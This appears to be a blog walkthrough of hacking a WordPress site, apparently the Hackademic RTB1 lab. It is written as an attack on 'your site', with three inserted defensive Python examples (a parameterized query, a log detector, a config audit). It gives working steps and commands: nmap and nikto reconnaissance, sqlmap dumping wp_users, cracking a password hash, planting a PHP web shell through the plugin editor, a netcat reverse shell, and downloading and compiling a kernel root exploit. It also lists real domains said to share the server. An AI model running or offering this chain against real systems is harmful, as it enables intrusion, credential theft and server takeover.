The answer to this question may be difficult to determine, simply because there are so many ways to hack a site. Our aim in this article is to show you the techniques most used by hackers when targeting and hacking your site.
Let’s suppose that this is your site: hack-test.com
Let’s ping this site to get the server IP:
Now we have 173.236.138.113 – this is the server IP where our target site is hosted.
To find other sites hosted on the same server, we will use sameip.org:
Same IP: 26 sites hosted on IP address 173.236.138.113
ID  Domain
1   hijackthisforum.com
2   sportforum.net
3   freeonlinesudoku.net
4   cosplayhell.com
5   videogamenews.org
6   gametour.com
7   qualitypetsitting.net
8   brendanichols.com
9   8ez.com
10  hack-test.com
11  kisax.com
12  paisans.com
13  mghz.com
14  debateful.com
15  jazzygoodtimes.com
16  fruny.com
17  vbum.com
18  wuckie.com
19  force5inc.com
20  virushero.com
21  twincitiesbusinesspeernetwork.com
22  jennieko.com
23  davereedy.com
24  joygarrido.com
25  prismapp.com
26  utiligolf.com
Twenty-six other websites are hosted on this server [173.236.138.113]. Many hackers will target all the other sites on the same server in order to hack your site. But for the purpose of study, we will target your site only and set aside hacking the other sites on the same server.
We’ll need more information about your site, such as:
DNS records (A, NS, TXT, MX and SOA)
Web server type (Apache, IIS, Tomcat)
Registrar (the company that owns your domain)
Your name, address, email and phone
Scripts that your site uses (php, asp, asp.net, jsp, cfm)
Your server OS (Unix, Linux, Windows, Solaris)
Your server’s ports open to the internet (80, 443, 21, etc.)
Let’s start with finding your site’s DNS records. We will use the website Who.is to achieve this:
We have discovered that your site DNS records are:
HACK-TEST.COM DNS RECORDS
Record             Type  TTL      Priority  Content
hack-test.com      A     4 hours            173.236.138.113
hack-test.com      SOA   4 hours            ns1.dreamhost.com. hostmaster.dreamhost.com. 2011032301 15283 1800 1814400 14400
hack-test.com      NS    4 hours            ns1.dreamhost.com
hack-test.com      NS    4 hours            ns3.dreamhost.com
hack-test.com      NS    4 hours            ns2.dreamhost.com
www.hack-test.com  A     4 hours            173.236.138.113
Let’s determine the web server type:
As you can see, your site’s web server is Apache. We will determine its version later.
HACK-TEST.COM SITE INFORMATION
IP: 173.236.138.113
Website Status: active
Server Type: Apache
Alexa Trend/Rank: 0; 1 Month: 3,213,968; 3 Month: 2,161,753
Page Views per Visit: 1 Month: 2.0; 3 Month: 3.7
Now it is time to find your domain registrar and your name, address, email and phone:
We now have your registrar and other vital information about you. We can find the type of scripts on your site (plus the OS type and web server version) by using a handy tool in BackTrack 5 R1 called WhatWeb:
Now we have found that your site is using a famous PHP script called WordPress, that your server OS is Fedora Linux and that your web server version is Apache 2.2.15. Let’s find the open ports on your server.
To do this, we will use nmap:
1 – Find the services that run on the server
root@bt:/# nmap -sV hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:39 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.0013s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
22/tcp closed ssh
80/tcp open   http    Apache httpd 2.2.15 ((Fedora))
MAC Address: 00:0C:29:01:8A:4D (VMware)
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds
2 – Find the server OS
root@bt:/# nmap -O hack-test.com
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-12-28 06:40 EET
Nmap scan report for hack-test.com (192.168.1.2)
Host is up (0.00079s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:01:8A:4D (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.22 (Fedora Core 6)
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds
Only port 80 is open and the OS is Linux 2.6.22 (Fedora Core 6).
Now that we have gathered all the important information about your site, let’s scan it for vulnerabilities such as
SQL injection, blind SQL injection, LFI, RFI, XSS, CSRF, and so forth.
We will use nikto.pl to gather information and, perhaps, find some vulnerabilities:
root@bt:/pentest/web/nikto# perl nikto.pl -h http://hack-test.com
- Nikto v2.1.4
---------------------------------------------------------------------------
+ Target IP:          192.168.1.2
+ Target Hostname:    hack-test.com
+ Target Port:        80
+ Start Time:         2011-12-29 06:50:03
---------------------------------------------------------------------------
+ Server: Apache/2.2.15 (Fedora)
+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b
+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host
+ End Time:           2011-12-29 06:50:37 (34 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
Next we launch the w3af GUI:
root@bt:/pentest/web/w3af# ./w3af_gui
Starting w3af, running on:
  Python version: 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) [GCC 4.4.3]
  GTK version: 2.20.1
  PyGTK version: 2.17.0
w3af - Web Application Attack and Audit Framework
Version: 1.2
Revision: 4605
Author: Andres Riancho and the w3af team.
We will insert our site URL and choose the full audit option:
After some time the scan will finish and you will see:
Your site is vulnerable to SQL injection, XSS and others!
Let’s investigate the sql injection vulnerability:
http://hack-test.com/Hackademic_RTB1/?cat=d%27z%220
This is the vulnerable URL, and cat is the vulnerable parameter.
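To make clear why a quote in the cat parameter is enough to expose the site, here is an added illustration (not code from the original walkthrough or from the Hackademic target) of a category lookup written the vulnerable way next to a hardened version. It uses Python over an in-memory SQLite table constructed for the example rather than the site’s PHP, so the table, its rows and the function names are all assumptions; the vulnerable form pastes the request value into the SQL text, which is why the d%27z%220 probe from the scan produces a database error and a tautology widens the result set, while the hardened form validates the expected type and binds the value as a parameter.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the site's posts table (in-memory SQLite, sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)")
    db.executemany("INSERT INTO posts VALUES (?, ?, ?)",
                   [(1, 1, "first"), (2, 1, "second"), (3, 2, "third")])
    return db


def posts_by_cat_vulnerable(db, cat):
    # Vulnerable form: the raw request value becomes part of the SQL text, so a
    # quote in the value closes the literal and the remainder is parsed as SQL.
    sql = "SELECT title FROM posts WHERE cat = '" + cat + "' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def probe_vulnerable(db, cat):
    """Run the vulnerable query and return either the rows or the database error
    text; that error message is the symptom an error-based scanner keys on."""
    try:
        return posts_by_cat_vulnerable(db, cat)
    except sqlite3.OperationalError as exc:
        return "error: " + str(exc)


def posts_by_cat_safe(db, cat):
    # Hardened form: check the type the application actually expects, then bind
    # the value as a parameter so the database never interprets it as SQL.
    if not cat.isdigit():
        raise ValueError("cat must be a numeric category id")
    return [row[0] for row in db.execute(
        "SELECT title FROM posts WHERE cat = ? ORDER BY id", (int(cat),))]


if __name__ == "__main__":
    db = make_db()
    print(probe_vulnerable(db, "1"))              # normal request
    print(probe_vulnerable(db, "d'z\"0"))         # the scanner's probe: SQL syntax error
    print(probe_vulnerable(db, "1' OR '1'='1"))   # tautology: every row comes back
    print(posts_by_cat_safe(db, "1"))             # hardened lookup, same normal result
```

The hardened function rejects the probe before the database sees it; if the parameter could legitimately contain free text, the type check would go away and parameter binding alone would still keep the value out of the SQL grammar.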
So, let’s exploit this vulnerability:
We will find that exploiting this vulnerability failed, so we will use sqlmap to do the job and dump all the database information we need to hack this site.
Using sqlmap with -u URL:
After some seconds you will see:
Type n and press enter to continue.
Let’s find all the databases on your site by adding --dbs:
Now we found 3 databases.
We will dump the wordpress database’s tables by adding -D wordpress --tables:
We will find all the wordpress tables.
We want to dump the wp_users table, so we will find all the users’ (admin?) information (user id and password hash), try to crack the hash, and enter the WordPress control panel (wp-admin).
We will list the columns of the wp_users table by adding -T wp_users --columns:
We will find 22 columns.
We just need to dump two columns, so we will dump the user_login and user_pass columns by adding
-C user_login,user_pass --dump
We will find important information: we now have the users and their password hashes,
but we want to crack those hashes to clear-text passwords. We will use the online site http://www.onlinehashcrack.com/free-hash-reverse.php
and try to crack this hash: 7CBB3252BA6B7E9C422FAC5334D22054
The clear-text password is q1w2e3
and the user name is GeorgeMiller.
We will log in with these details at wp-admin.
And we are in!
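Every step so far (the Nikto run, the quote-bearing cat probe, the sqlmap dump) and the plugin-editor save used in the next step leaves a line in the server’s access log, so here is an added example of the detection logic a defender would run over that log. It is not part of the original article and assumes Apache’s combined log format; the sample lines are constructed to mirror the walkthrough rather than taken from any real server, and the rule names, the SQL-injection regex and the list of probed default files are the author’s own choices. The nikto and sqlmap rules rely on both tools announcing themselves in their default User-Agent strings, which a careful attacker can change, so the query-string and method rules are the ones that do not depend on the client being honest.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache "combined" access-log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Crude SQL-injection probe signature over the decoded query string: a raw
# quote, an SQL comment opener, or a boolean clause such as "AND 1=1".
# Legitimate values with apostrophes (O'Brien) will trip it, so treat hits as
# leads to review alongside the client's other requests, not as verdicts.
SQLI_RE = re.compile(r"""['"]|--|/\*|\b(?:and|or)\b\s+[\w']+\s*=""", re.IGNORECASE)

PLUGIN_EDITOR = "/wp-admin/plugin-editor.php"   # WordPress's built-in plugin editor
DEFAULT_FILES = ("/icons/README",)               # Apache default file that Nikto probes


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the list of rule names a parsed log entry trips (empty if none)."""
    tags = []
    ua = entry["ua"].lower()
    method = entry["method"].upper()
    url = urlsplit(entry["target"])
    if method == "TRACE":
        tags.append("trace-method")          # the XST finding from the Nikto run
    if "nikto" in ua:
        tags.append("nikto-scanner")         # Nikto's default User-Agent names itself
    if "sqlmap" in ua:
        tags.append("sqlmap")                # so does sqlmap's
    if url.path in DEFAULT_FILES:
        tags.append("default-file-probe")
    query = unquote_plus(url.query)
    if query and SQLI_RE.search(query):
        tags.append("sqli-probe")
    if method == "POST" and url.path.endswith(PLUGIN_EDITOR):
        tags.append("plugin-editor-write")   # a plugin file was saved through wp-admin
    return tags


def scan(lines):
    """Return (tags, client ip, request) for every entry that trips at least one rule."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if tags:
            hits.append((tags, entry["ip"], entry["method"] + " " + entry["target"]))
    return hits


# Constructed sample lines mirroring the walkthrough's steps (not real server logs).
SAMPLE_LOG = [
    '192.168.1.6 - - [29/Dec/2011:06:50:05 +0200] "TRACE / HTTP/1.1" 200 1475 "-" '
    '"Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:000026)"',
    '192.168.1.6 - - [29/Dec/2011:06:50:10 +0200] "GET /icons/README HTTP/1.1" 200 5108 "-" '
    '"Mozilla/5.00 (Nikto/2.1.4) (Evasions:None) (Test:003092)"',
    '192.168.1.6 - - [29/Dec/2011:07:02:11 +0200] "GET /Hackademic_RTB1/?cat=d%27z%220 HTTP/1.1" '
    '500 612 "-" "Mozilla/5.0 (X11; Linux i686) Gecko/20100101 Firefox/8.0"',
    '192.168.1.6 - - [29/Dec/2011:07:05:40 +0200] "GET /Hackademic_RTB1/?cat=1%20AND%201=1 HTTP/1.1" '
    '200 2310 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
    '192.168.1.6 - - [29/Dec/2011:07:30:02 +0200] '
    '"POST /Hackademic_RTB1/wp-admin/plugin-editor.php HTTP/1.1" 302 0 '
    '"http://hack-test.com/Hackademic_RTB1/wp-admin/plugin-editor.php" '
    '"Mozilla/5.0 (X11; Linux i686) Gecko/20100101 Firefox/8.0"',
    '10.0.0.5 - - [29/Dec/2011:07:31:00 +0200] "GET /Hackademic_RTB1/?cat=3 HTTP/1.1" 200 2310 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/8.0"',
]

if __name__ == "__main__":
    for tags, ip, request in scan(SAMPLE_LOG):
        print(ip, request, "->", ", ".join(tags))
```

Run as a script it prints one line per flagged request; the benign cat=3 request from the second client trips nothing. The plugin-editor rule is the one worth alerting on by itself, since a legitimate administrator rarely saves plugin source through the browser, whereas a single sqli-probe hit is only interesting once the same client also shows scanner traffic.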
OK, let’s try to upload a PHP web shell to run some Linux commands on your site’s server.
We will edit a plugin in WordPress called Textile, or any plugin you find on the plugins page,
and choose to edit it.
We will insert the PHP web shell in place of the real plugin code. After we have done this, we hit [Update File] and browse to our new PHP shell.
Woo, the PHP shell works. Now we can manipulate your site’s files, but we want to get root on your server and hack all the other sites too.
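The Nikto findings earlier (TRACE enabled, /icons/ directory indexing, the full version banner) and the plugin editor just used to plant the shell are all configuration defaults that the site owner can switch off. As an added example that is not part of the original article, here is a small audit that reads an httpd.conf fragment and a wp-config.php fragment and reports which of those settings are still in their weak state; the two configuration fragments are constructed for the example (they are not the target’s real configuration), and the directive names it checks, TraceEnable, ServerTokens, ServerSignature, Options Indexes and WordPress’s DISALLOW_FILE_EDIT constant, are real. The audit treats the file flatly, so a more specific Directory block overriding an earlier Options line is not modelled.

```python
import re

# Constructed httpd.conf fragments (not the page's own server config). The weak
# one reproduces what Nikto reported: TRACE enabled, /icons/ listable, version
# banner exposed. The hardened one turns each item off.
WEAK_HTTPD_CONF = """\
ServerTokens OS
ServerSignature On
TraceEnable On
<Directory "/var/www/icons">
    Options Indexes MultiViews FollowSymLinks
    AllowOverride None
</Directory>
"""

HARDENED_HTTPD_CONF = """\
ServerTokens Prod
ServerSignature Off
TraceEnable Off
<Directory "/var/www/icons">
    Options -Indexes +MultiViews -FollowSymLinks
    AllowOverride None
</Directory>
"""

# wp-config.php fragments: the built-in theme/plugin editor is what turned a
# plugin into a PHP shell above; DISALLOW_FILE_EDIT removes that editor.
WEAK_WP_CONFIG = "define('DB_NAME', 'wordpress');\n"
HARDENED_WP_CONFIG = (
    "define('DB_NAME', 'wordpress');\n"
    "define('DISALLOW_FILE_EDIT', true);\n"
)


def _directives(conf):
    """Yield (name, value) for each Apache directive line, skipping comments and
    the <Directory> / </Directory> container lines."""
    for raw in conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("<"):
            continue
        parts = line.split(None, 1)
        yield parts[0].lower(), (parts[1] if len(parts) > 1 else "")


def audit_httpd_conf(conf):
    """Return a list of weak-setting findings for an httpd.conf fragment."""
    findings = []
    seen = {}
    for name, value in _directives(conf):
        if name == "options":
            # Any "Indexes" token not prefixed with "-" enables directory listing.
            if any(t.lower() in ("indexes", "+indexes") for t in value.split()):
                findings.append("directory indexing enabled (Options Indexes)")
        else:
            seen[name] = value.lower()
    # Apache defaults when a directive is absent: TraceEnable On,
    # ServerTokens Full, ServerSignature Off.
    if seen.get("traceenable", "on") != "off":
        findings.append("HTTP TRACE enabled (add 'TraceEnable Off')")
    if seen.get("servertokens", "full") != "prod":
        findings.append("version banner exposed (set 'ServerTokens Prod')")
    if seen.get("serversignature", "off") == "on":
        findings.append("version shown on error pages (set 'ServerSignature Off')")
    return findings


WP_EDIT_RE = re.compile(
    r"define\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE)


def audit_wp_config(php):
    """Return a finding unless wp-config.php disables the theme/plugin editor."""
    if WP_EDIT_RE.search(php):
        return []
    return ["plugin/theme editor enabled (add define('DISALLOW_FILE_EDIT', true);)"]


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_HTTPD_CONF), ("hardened", HARDENED_HTTPD_CONF)):
        print(label, "httpd.conf:", audit_httpd_conf(conf) or "no findings")
    for label, php in (("weak", WEAK_WP_CONFIG), ("hardened", HARDENED_WP_CONFIG)):
        print(label, "wp-config.php:", audit_wp_config(php) or "no findings")
```

Disabling the editor does not stop an attacker who already holds administrator credentials from uploading a plugin archive instead, so it belongs together with the credential hygiene the cracked q1w2e3 password shows is missing; it does remove the one-click route used here.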
We will choose the [back-connect] tab in the PHP web shell and make a back connection to our IP 192.168.1.6 on port 5555.
But before we hit connect, we first make netcat listen on port 5555 on our attacker machine.
Now hit connect and you will see:
Let’s try some linux commands
id
uid=48(apache) gid=489(apache) groups=489(apache)
pwd
/var/www/html/Hackademic_RTB1/wp-content/plugins
uname -a
Linux HackademicRTB1 2.6.31.5-127.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux
The id command shows us our user id and group.
The pwd command shows us our current path on the server.
The uname -a command shows us some information about the kernel version.
Let’s search exploit-db.com for an exploit for this kernel version or a newer one.
We will type [kernel 2.6.31]:
Date        D A V  Description  Plat.  Author
2009-10-15  -      Linux Kernel < 2.6.31-rc4 nfs4_proc_lock() Denial of Service  904  linux  Simon Vallet
2009-08-31  -      Linux Kernel < 2.6.31-rc7 AF_IRDA 29-Byte Stack Disclosure Exploit  1370  linux  Jon Oberheide
2009-08-25  -      Linux Kernel <= 2.6.31-rc7 AF_LLC getsockname 5-Byte Stack Disclosure  1059  linux  Jon Oberheide
2009-08-04  -      Linux Kernel <= 2.6.31-rc5 sigaltstack 4-Byte Stack Disclosure Exploit  1064  linux  Jon Oberheide
After I tried all of them on your server, none of them worked, but then I tried a new exploit
Date        D A V  Description  Plat.  Author
2010-10-19  -      Linux RDS Protocol Local Privilege Escalation  9977  linux  Dan Rosenberg
http://www.exploit-db.com/exploits/15285
I opened this URL and copied this link
and ran this command in my netcat shell:
wget http://www.exploit-db.com/download/15285 -O roro.c
--2011-12-28 00:48:01--  http://www.exploit-db.com/download/15285
Resolving www.exploit-db.com... 199.27.135.111, 199.27.134.111
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://www.exploit-db.com/download/15285/ [following]
--2011-12-28 00:48:02--  http://www.exploit-db.com/download/15285/
Connecting to www.exploit-db.com|199.27.135.111|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7154 (7.0K) [application/txt]
Saving to: `roro.c'
     0K ......                                                100% 29.7K=0.2s
We used the wget command to fetch the exploit from exploit-db.com and used -O to save it under the name roro.c.
Note: Linux kernel exploits are mostly developed in the C language, so we saved it with a .c extension. Just view the exploit source and you will find:
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#include <string.h>
#include <sys/ptrace.h>
#include <sys/utsname.h>

#define RECVPORT 5555
#define SENDPORT 6666

int prep_sock(int port)
{
    int s, ret;
    struct sockaddr_in addr;

    s = socket(PF_RDS, SOCK_SEQPACKET, 0);
    if(s < 0) {
        printf("[*] Could not open socket.\n");
        exit(-1);
    }
    memset(&addr, 0, sizeof(addr));
All the above lines indicate that this exploit is written in C.
After we have saved our exploit on the server, we will compile it to ELF format by typing
gcc roro.c -o roro
and run our exploit by typing
./roro
After that we type id
and we will find that we are root:
uid=0(root) gid=0(root)
Author: Robert’s Blog